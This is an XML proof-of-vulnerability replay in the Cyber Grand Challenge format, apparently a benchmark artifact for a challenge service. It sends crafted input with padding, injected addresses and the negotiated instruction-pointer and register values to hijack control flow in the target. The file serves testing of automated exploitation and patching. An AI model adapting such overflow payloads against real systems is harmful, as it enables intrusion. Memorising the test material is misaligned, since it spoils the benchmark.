<?xml version="1.0" standalone="no" ?>
<!DOCTYPE cfepov SYSTEM "/usr/share/cgc-docs/cfe-pov.dtd">
<cfepov>
<cbid>service</cbid>
<replay>
    <negotiate>
        <type1>
            <ipmask>0xffffffff</ipmask>
            <regmask>0xffffffff</regmask>
            <regnum>0</regnum>
        </type1>
    </negotiate>

    <write><data>i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00a\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0aa\x0a</data></write>
    <read><length>4</length><match><data>\x00\x00\x00\x00</data></match></read>
    <write><data>a\x81\x00\x00\x00\x81\x00\x00\x00\x20\x00\x00\x00bbbbbbbbbbbbbbbbbbbb\xfe\xff\xff\xff\x50\xfb\xff\xb7\x78\xd0\x04\x08</data></write>
    <read><length>4</length><match><data>\x00\x00\x00\x00</data></match></read>
    <write><data>n\x6c\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00</data></write>
    <read><length>157</length></read>
    <write><data>n\x6c\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00</data></write>
    <read><length>157</length></read>
    <write><data>t\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00</data><var>TYPE1_IP</var><var>TYPE1_REG</var></write>
    <read><length>4</length><match><data>\xff\xff\xff\xff</data></match></read>
    <write><data>q\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00</data></write>
    <delay>100</delay>
</replay>
</cfepov>
